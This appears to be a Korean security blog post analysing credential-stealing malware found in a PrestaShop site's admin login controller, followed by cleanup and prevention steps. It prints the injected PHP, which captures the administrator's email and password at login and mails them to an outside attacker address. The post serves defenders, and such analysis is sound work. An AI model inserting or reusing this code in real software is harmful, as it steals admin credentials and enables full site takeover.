성장하는 전자 상거래 플랫폼인 Prestashop은 정보를 훔치려는 해커의 거대한 표적입니다. 일반적으로 표적이 되는 정보는 신용 카드 번호이지만 최근에 우리 연구원들은 Prestashop 사이트를 표적으로 삼고 사이트 관리자 자격 증명을 도용하는 새로운 유형의 자격 증명 도용 멀웨어를 발견했습니다. 이로 인해 웹사이트가 완전히 장악될 수 있습니다.
Prestashop 자격 증명 도용 멀웨어의 작동 원리
./controllers/admin/AdminLoginController.php 파일에 삽입된 것으로 발견된 Prestashop 자격 증명 도용 멀웨어 다음과 같은 Prestashop 사이트:
public function processLogin()
{
/* Check fields validity */
$passwd = trim(Tools::getValue('passwd'));
$email = trim(Tools::getValue('email'));
$to = "admin@wsxdn.com";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <admin@wsxdn.com>";
$message = "Link : https://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
이 코드는 서버 정보를 변수에 전달하는 데 사용됩니다. 전달된 변수 중 일부에는 Prestashop 백엔드에 로그인하는 데 사용되는 사용자 이름과 비밀번호가 포함됩니다. 이렇게 수집된 정보는 때때로 PHP mail() function을 사용하여 해커의 이메일 주소로 전송됩니다. .
전송된 이메일에는 공격자가 해킹된 Prestashop 사이트에 로그인하는 데 필요한 모든 것이 포함되어 있습니다. 거기에서 사이트에 액세스할 수 있습니다. 이렇게 하면 웹사이트의 백엔드 인터페이스에 완전히 액세스할 수 있습니다. 즉, 콘텐츠를 변경하고 가짜/감염된 모듈이나 플러그인을 설치하는 등 훨씬 더 많은 일을 할 수 있습니다.
어떤 경우에는 이 해킹의 피해자가 반송 이메일을 받기 시작했습니다. 이는 Google이 공격을 감지하고 관련 계정을 비활성화/보고했기 때문일 수 있습니다.
이 악성코드 감염 캠페인을 운영하는 공격자/해킹 그룹의 이름은 bajatx / B4JAT4T로 추정됩니다.
Prestashop 자격 증명 도용 멀웨어 감염 후 사이트 수정 방법
1. 청소하기 전에 사이트를 백업하세요.
청소하는 동안 사용자가 감염된 페이지를 방문하지 않도록 웹 사이트를 오프라인으로 전환하는 것이 좋습니다. 모든 핵심 파일과 데이터베이스를 백업해야 합니다. .zip과 같은 압축 파일 형식으로 백업하는 것이 좋습니다.
2. 코어, 플러그인 및 테마 파일을 교체합니다.
감염된 코어 파일을 평판이 좋은 출처의 동일한 원본 버전으로 교체할 수 있습니다. 이러한 파일 및 디렉토리의 최신 및 업데이트 버전을 다운로드한 후 이전 버전을 삭제할 수 있습니다. 이는 악성 코드가 코어 파일 내부에서 발견되었기 때문에 Prestashop 자격 증명 도용 맬웨어를 정리하는 데 특히 중요합니다.
3. 최근에 수정된 의심스러운 파일을 정리합니다.
최근에 수정된 파일을 보면 잠재적으로 감염된 파일을 찾을 수 있습니다. 가지고 있는 깨끗한 백업이나 신뢰할 수 있는 출처에서 이러한 파일을 복원할 수 있습니다.
4. 맬웨어 검사를 실행합니다.
맬웨어 및 악성 파일에 대해 웹 서버에서 맬웨어 검사를 실행합니다. 웹 호스트에서 제공하는 cPanel에서 '바이러스 스캐너' 도구를 사용하거나 공격을 차단하고 훔친 데이터를 다운로드하려는 봇을 차단하는 Astra Pro Plan을 사용하여 전문 맬웨어 정리를 받을 수 있습니다.
이 단계 외에도 Prestashop 보안에 대한 이 문서가 도움이 될 수 있습니다.
추가 공격을 방지하는 방법
사이트를 수정한 후 Prestashop 자격 증명 도용 멀웨어로부터 웹사이트를 안전하게 유지하기 위해 따라야 할 몇 가지 우수한 보안 관행이 있습니다.
- 소프트웨어의 최신 업데이트를 실행하고 있는지 확인
- 신뢰할 수 있는 타사 결제 처리업체 사용
- 정기적인 멀웨어 검사/보안 감사 수행
- 방화벽에 투자
해커의 진화하는 방법으로부터 웹 사이트를 보호하는 유일한 확실한 방법은 보안에 투자하는 것입니다. 웹사이트 방화벽에 투자하고, 맬웨어 검사를 자주 실행하고, 정기적인 보안 감사를 받는 것은 웹사이트의 전반적인 보안에 대한 좋은 아이디어를 얻을 수 있는 좋은 아이디어입니다.